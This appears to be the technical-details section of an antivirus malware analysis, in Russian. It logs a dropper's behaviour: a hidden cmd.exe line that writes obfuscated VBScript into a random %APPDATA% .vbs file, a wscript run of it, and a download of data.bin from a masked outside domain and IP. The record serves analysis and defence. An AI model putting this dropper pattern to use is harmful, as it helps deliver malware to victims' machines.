Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "Kt=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm JVt" "SUb VIOHku()" "Du=51" "DiM IO,R1gAUg" "M7aP=67" "Do WhIle IO<>5007-5006" "R1gAUg=R1gAUg+1" "lOOP" "Frr=76" "enD suB" "sUb Sfty()"...
- %APPDATA%\31521.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\31521.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "Kt=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm JVt" "SUb VIOHku()" "Du=51" "DiM IO,R1gAUg" "M7aP=67" "Do WhIle IO<>5007-5006" "R1gAUg=R1gAUg+1" "lOOP" "Frr=76" "enD suB" "sUb Sfty()"...' (со скрытым окном)